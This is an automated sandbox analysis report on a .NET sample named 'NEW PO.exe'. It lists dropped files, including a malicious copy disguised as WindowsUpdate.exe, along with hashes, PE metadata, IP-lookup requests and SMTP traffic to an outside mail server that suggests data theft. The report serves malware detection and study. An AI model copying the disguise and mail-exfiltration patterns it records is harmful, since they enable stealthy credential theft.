Preview:	.V. ... .......F1.......te3....wg.......................o.....,...y..,...y..h.q.........................6..43....wI.............................................................................................Z............B.................................................................................................................. .......7*...y..........................................................................................................................................................................................................................................+...y.y.................,...+...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bhvF8EB.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x2e45d84b, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	1.0515137857335044
Encrypted:	false
SSDEEP:	24576:F7qA2TaAxucRfDw/ND0Xko5QqbMgSFDb7uBi:URfD3y
MD5:	3042CAAEE52655CA002C2960DBD44156
SHA1:	5294AF930E5AEEE2B024744DF918FFE768CB97C9
SHA-256:	7189E52085B69F651887B9B5DB9E3F9683BE94D5B247F7AE5B1A73B151E24858
SHA-512:	69727D18648F18396E00A8C08CEF2471F803305F62E203DDB155F45E3DD0522DE989E63E264F43874DC2C7A314BB35A4DF61A94E167040D341BF7ABC8A59710D
Malicious:	false
Reputation:	unknown
Preview:	.E.K... .......F1.......te3....wg.......................o.....,...y..,...y..h.q.........................6..43....wI.............................................................................................Z............B.................................................................................................................. .......7...y........................................................................................................................................................................................................................................D>7...y.y.................).J.*...y?.........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\holderwb.txt Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	unknown
Preview:	..

C:\Users\user\AppData\Roaming\WindowsUpdate.exe Download File
Process:	C:\Users\user\Desktop\NEW PO.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	774144
Entropy (8bit):	7.880107119214288
Encrypted:	false
SSDEEP:	12288:S1xn35Qfx7M5fMcm8FvLS3agsmMIFCnJGzhm0pIy4n8wmnPVMliAyZg5N44:Sz351JrFzeNIJGFBmy48ddMliRZg5N4
MD5:	770F6E88B7BF3FE3AAE144A5AA41DC96
SHA1:	ED96D179403AB319DA62C092A817A5EBEEA8C3DA
SHA-256:	08187BE5BB78DA6C7751C5D870D46E43E6B4204DB6ABF2CC2D80E9830FD136BA
SHA-512:	90D8F872263FBB46BC8E71BC7A370581F39DD1FE740E5972805D45C4BD8FB81E19E12D3154C3E694839F24AAD9A5E73ECBF381FA54DD399BF8E4145589C8DD19
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dnza..............0.................. ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........G..`.......C....:......................................................................?................................?................................?................................?............................................................................................................ .......@........................................................ .......@........................................................ .......@.....................................

C:\Users\user\AppData\Roaming\WindowsUpdate.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\NEW PO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\pid.txt Download File
Process:	C:\Users\user\AppData\Roaming\WindowsUpdate.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:bin:e
MD5:	43E04DD08BB1305428B0C9C8D8A2660A
SHA1:	426076EBC703102E66F5722E4ABF70B380EEC15E
SHA-256:	043B901F48C813CFB6C1BB34FF866F0F73E2690A8181DE6121A0278F31B6253D
SHA-512:	482A0846E3989C334C92CC587F123587D862BB97E69B4A57F06F96E973F2F9CEDC454DE83507D3A2B66DC72AD4B960373F93F09840A8BC4083884370C0D8376C
Malicious:	false
Reputation:	unknown
Preview:	3996

C:\Users\user\AppData\Roaming\pidloc.txt Download File
Process:	C:\Users\user\AppData\Roaming\WindowsUpdate.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	48
Entropy (8bit):	4.387380345401073
Encrypted:	false
SSDEEP:	3:oNWXp5cViEaKC59KuCa:oNWXp+NaZ5v
MD5:	95FC50C7E40BB0D5EBD49FCBEE4E890D
SHA1:	E5086A9390CC8D6F512A206AB1AC4309A4CC4326
SHA-256:	DC88107DF527833D0D8B7AC45D31AF0E5343AE36AB9725016B046CDD77E46EC7
SHA-512:	4AC9E01163C00CC874BDBE1E4B5BF2463F8B53B9102705C774C790D8DFD8AEAD662DEDA812CF457022820FFD8174A1CD0275601C4BC6E4CCDB7E5A80CD52F799
Malicious:	false
Reputation:	unknown
Preview:	C:\Users\user\AppData\Roaming\WindowsUpdate.exe

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.277034631409952
Encrypted:	false
SSDEEP:	12288:9OeYHJvCquajLhOF82EwJG64uQpMVVXKTm6wzHnR/5sEFOLi8IQAhm:4eYHJvCquajLhOjd
MD5:	B9FEDE34538A4B64EABC43541461671D
SHA1:	2BE5E4F403EEFB0CD08619280408437F9471C164
SHA-256:	FB09EB2D2149D103F2B612E793913B92A270CD1B9B779C9CF61384686E9FAAB6
SHA-512:	0884950B4CEA35AB2F8D13E925DC9A48A12384497957A44E558042EC5D567EB4F8400C8636843EBADB9FFC66D4B7152C291A1D1DE097DBA95C666F84764DAF4E
Malicious:	false
Reputation:	unknown
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...D...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	4.217554824061032
Encrypted:	false
SSDEEP:	768:L20kdCQMwqhCrrC2i5ftx1aJ4Xw/FT7ABqXPeq5QMVyi6a54LXsuzxSNWv:LNfCCg38CREhL
MD5:	AD5FEEAF6306262EDDB4ACF5D8D346FB
SHA1:	D4E55BC73AA0CE125C35FA9D87F9D8233E88CEF6
SHA-256:	44232A8F8FB4C8CA684C7941CBEC62163EB822C9F6F53C1671CC3EA38AD89521
SHA-512:	F2AC2C9360957F9DFD458923C6F3AFB963E367E10D039C8E3BBD834D7E5758AB09DB2782CF46EA7903E09F9B1DBB4F97DB514500D3540ADF709DEE3C80CC37DA
Malicious:	false
Reputation:	unknown
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...D...................................................................................................................................................................................................................................................................................................................................................HvLE........Y...........Oyf.vA.k.L...8.......... ....... .......P.......0................... ..hbin................p.\..,..........nk,.%-..D................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .%-..D....... ........................... .......Z.......................Root........lf......Root....nk .%-..D....................}.............. ...............*...............DeviceCensus.......................vk..................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.880107119214288
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	NEW PO.exe
File size:	774144
MD5:	770f6e88b7bf3fe3aae144a5aa41dc96
SHA1:	ed96d179403ab319da62c092a817a5ebeea8c3da
SHA256:	08187be5bb78da6c7751c5d870d46e43e6b4204db6abf2cc2d80e9830fd136ba
SHA512:	90d8f872263fbb46bc8e71bc7a370581f39dd1fe740e5972805d45c4bd8fb81e19e12d3154c3e694839f24aad9a5e73ecbf381fa54dd399bf8e4145589c8dd19
SSDEEP:	12288:S1xn35Qfx7M5fMcm8FvLS3agsmMIFCnJGzhm0pIy4n8wmnPVMliAyZg5N44:Sz351JrFzeNIJGFBmy48ddMliRZg5N4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dnza..............0.................. ........@.. .......................@............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4be22e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x617A6E64 [Thu Oct 28 09:33:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbe1e0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc0000	0x608	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbc234	0xbc400	False	0.923099269588	data	7.88873846261	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xc0000	0x608	0x800	False	0.328125	data	3.46210381505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc2000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xc00a0	0x378	data
RT_MANIFEST	0xc0418	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright HP Inc. 2017
Assembly Version	1.0.0.0
InternalName	CLRSurrogateEnt.exe
FileVersion	1.0.0.0
CompanyName	HP Inc.
LegalTrademarks
Comments
ProductName	Lab_4_V1_2017_09_21
ProductVersion	1.0.0.0
FileDescription	Lab_4_V1_2017_09_21
OriginalFilename	CLRSurrogateEnt.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/28/21-14:43:11.069910	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49748	104.16.155.36	192.168.2.3
10/28/21-14:43:47.071824	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49757	104.16.155.36	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2021 14:43:11.019169092 CEST	49748	80	192.168.2.3	104.16.155.36
Oct 28, 2021 14:43:11.036216974 CEST	80	49748	104.16.155.36	192.168.2.3
Oct 28, 2021 14:43:11.036401987 CEST	49748	80	192.168.2.3	104.16.155.36
Oct 28, 2021 14:43:11.043543100 CEST	49748	80	192.168.2.3	104.16.155.36
Oct 28, 2021 14:43:11.060439110 CEST	80	49748	104.16.155.36	192.168.2.3
Oct 28, 2021 14:43:11.069910049 CEST	80	49748	104.16.155.36	192.168.2.3
Oct 28, 2021 14:43:11.123039007 CEST	49748	80	192.168.2.3	104.16.155.36
Oct 28, 2021 14:43:12.641005993 CEST	49748	80	192.168.2.3	104.16.155.36
Oct 28, 2021 14:43:12.660057068 CEST	80	49748	104.16.155.36	192.168.2.3
Oct 28, 2021 14:43:12.660156012 CEST	49748	80	192.168.2.3	104.16.155.36
Oct 28, 2021 14:43:12.891926050 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:12.934421062 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:12.934525967 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:15.111594915 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.118011951 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:15.160418034 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.160445929 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.162899017 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:15.205374002 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.209489107 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.263010025 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:15.418025017 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:15.461630106 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.465209961 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.465270042 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.465287924 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.465300083 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.465353966 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:15.507816076 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.560699940 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:15.564694881 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:15.608211994 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.653784037 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:15.951602936 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:15.994479895 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:15.995546103 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:16.038141966 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:16.038681030 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:16.087984085 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:16.088377953 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:16.131851912 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:16.132246971 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:16.177658081 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:16.178095102 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:16.227938890 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:16.229852915 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:16.229880095 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:16.229883909 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:16.230189085 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:16.272330046 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:16.272694111 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:16.328883886 CEST	587	49749	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:16.372522116 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:41.588838100 CEST	49749	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:47.024471045 CEST	49757	80	192.168.2.3	104.16.155.36
Oct 28, 2021 14:43:47.042136908 CEST	80	49757	104.16.155.36	192.168.2.3
Oct 28, 2021 14:43:47.042231083 CEST	49757	80	192.168.2.3	104.16.155.36
Oct 28, 2021 14:43:47.042749882 CEST	49757	80	192.168.2.3	104.16.155.36
Oct 28, 2021 14:43:47.059446096 CEST	80	49757	104.16.155.36	192.168.2.3
Oct 28, 2021 14:43:47.071824074 CEST	80	49757	104.16.155.36	192.168.2.3
Oct 28, 2021 14:43:47.125102043 CEST	49757	80	192.168.2.3	104.16.155.36
Oct 28, 2021 14:43:49.601188898 CEST	49757	80	192.168.2.3	104.16.155.36
Oct 28, 2021 14:43:49.619297028 CEST	80	49757	104.16.155.36	192.168.2.3
Oct 28, 2021 14:43:49.621902943 CEST	49757	80	192.168.2.3	104.16.155.36
Oct 28, 2021 14:43:49.746953964 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:49.789490938 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:49.789563894 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:51.831136942 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:51.837745905 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:51.880435944 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:51.880465031 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:51.880744934 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:51.923388004 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:51.923423052 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:51.969254017 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:51.969713926 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.012176037 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.012528896 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.012558937 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.012583017 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.012599945 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.012623072 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.012661934 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.055291891 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.063004971 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.106468916 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.156745911 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.180295944 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.228564978 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.229182005 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.272068977 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.272759914 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.334686041 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.335300922 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.378505945 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.380063057 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.424993038 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.425535917 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.479861975 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.498454094 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.498708010 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.499182940 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.510931015 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:43:52.541515112 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.555104017 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.610054970 CEST	587	49760	194.152.32.10	192.168.2.3
Oct 28, 2021 14:43:52.656785011 CEST	49760	587	192.168.2.3	194.152.32.10
Oct 28, 2021 14:44:15.451742887 CEST	49760	587	192.168.2.3	194.152.32.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2021 14:43:10.965198040 CEST	54154	53	192.168.2.3	8.8.8.8
Oct 28, 2021 14:43:10.990313053 CEST	53	54154	8.8.8.8	192.168.2.3
Oct 28, 2021 14:43:12.834615946 CEST	52806	53	192.168.2.3	8.8.8.8
Oct 28, 2021 14:43:12.853415966 CEST	53	52806	8.8.8.8	192.168.2.3
Oct 28, 2021 14:43:46.966675043 CEST	56009	53	192.168.2.3	8.8.8.8
Oct 28, 2021 14:43:46.989118099 CEST	53	56009	8.8.8.8	192.168.2.3
Oct 28, 2021 14:43:49.683657885 CEST	49572	53	192.168.2.3	8.8.8.8
Oct 28, 2021 14:43:49.702991962 CEST	53	49572	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 28, 2021 14:43:10.965198040 CEST	192.168.2.3	8.8.8.8	0x9e68	Standard query (0)	whatismyipaddress.com	A (IP address)	IN (0x0001)
Oct 28, 2021 14:43:12.834615946 CEST	192.168.2.3	8.8.8.8	0xc9ce	Standard query (0)	mail.inbox.lv	A (IP address)	IN (0x0001)
Oct 28, 2021 14:43:46.966675043 CEST	192.168.2.3	8.8.8.8	0xae52	Standard query (0)	whatismyipaddress.com	A (IP address)	IN (0x0001)
Oct 28, 2021 14:43:49.683657885 CEST	192.168.2.3	8.8.8.8	0x1315	Standard query (0)	mail.inbox.lv	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 28, 2021 14:43:10.990313053 CEST	8.8.8.8	192.168.2.3	0x9e68	No error (0)	whatismyipaddress.com		104.16.155.36	A (IP address)	IN (0x0001)
Oct 28, 2021 14:43:10.990313053 CEST	8.8.8.8	192.168.2.3	0x9e68	No error (0)	whatismyipaddress.com		104.16.154.36	A (IP address)	IN (0x0001)
Oct 28, 2021 14:43:12.853415966 CEST	8.8.8.8	192.168.2.3	0xc9ce	No error (0)	mail.inbox.lv		194.152.32.10	A (IP address)	IN (0x0001)
Oct 28, 2021 14:43:34.242847919 CEST	8.8.8.8	192.168.2.3	0x54e8	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Oct 28, 2021 14:43:46.989118099 CEST	8.8.8.8	192.168.2.3	0xae52	No error (0)	whatismyipaddress.com		104.16.155.36	A (IP address)	IN (0x0001)
Oct 28, 2021 14:43:46.989118099 CEST	8.8.8.8	192.168.2.3	0xae52	No error (0)	whatismyipaddress.com		104.16.154.36	A (IP address)	IN (0x0001)
Oct 28, 2021 14:43:49.702991962 CEST	8.8.8.8	192.168.2.3	0x1315	No error (0)	mail.inbox.lv		194.152.32.10	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

whatismyipaddress.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49748	104.16.155.36	80	C:\Users\user\Desktop\NEW PO.exe

Timestamp	kBytes transferred	Direction	Data
Oct 28, 2021 14:43:11.043543100 CEST	1091	OUT	GET / HTTP/1.1 Host: whatismyipaddress.com Connection: Keep-Alive
Oct 28, 2021 14:43:11.069910049 CEST	1092	IN	HTTP/1.1 403 Forbidden Date: Thu, 28 Oct 2021 12:43:11 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: keep-alive X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 6a543f9218035b86-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49757	104.16.155.36	80	C:\Users\user\Desktop\NEW PO.exe

Timestamp	kBytes transferred	Direction	Data
Oct 28, 2021 14:43:47.042749882 CEST	1169	OUT	GET / HTTP/1.1 Host: whatismyipaddress.com Connection: Keep-Alive
